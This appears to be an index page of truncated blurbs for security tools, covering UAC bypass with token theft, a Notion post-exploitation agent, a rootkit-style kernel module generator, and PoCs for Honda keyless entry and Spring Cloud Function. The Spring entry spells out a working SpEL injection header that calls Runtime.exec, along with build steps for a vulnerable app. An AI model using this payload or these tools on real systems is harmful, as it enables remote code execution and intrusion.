Auto-Elevate tool demonstrates the power of UAC bypasses and built-in features of Windows. This utility auto-locates winlogon.exe, steals and impersonates it's…
Subdomains.Sh is a wrapper around tools used for subdomain enumeration, to automate the workflow, on a given domain, written in…
Slyther is AWS Security tool to check read/write/delete access for S3 buckets. Requirements aws-cli Installation pip3 install -r requirements.txt Usage…
Spring-Spel-0Day-Poc is spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") build wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zipunzip v3.1.6.zipcd spring-cloud-function-3.1.6cd spring-cloud-function-samples/function-sample-pojomvn packagejava -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar get path…
Cloak is a pluggable transport that enhances traditional proxy tools like OpenVPN to evade sophisticated censorship and data discrimination. Cloak is not a standalone proxy…
OffensiveNotion combines the capabilities of a post-exploitation agent with the power and comfort of the Notion notetaking application. The agent…
CVE-2022-27254 is a PoC for vulnerability in Honda's Remote Keyless System(CVE-2022-27254). Summary This is a proof of concept for CVE-2022-27254, wherein…
CVE-2022-22963 is to run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run…
Casper-fs is a custom Linux Kernel Module generator to work with resources to protect or hide a custom list of…
LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests…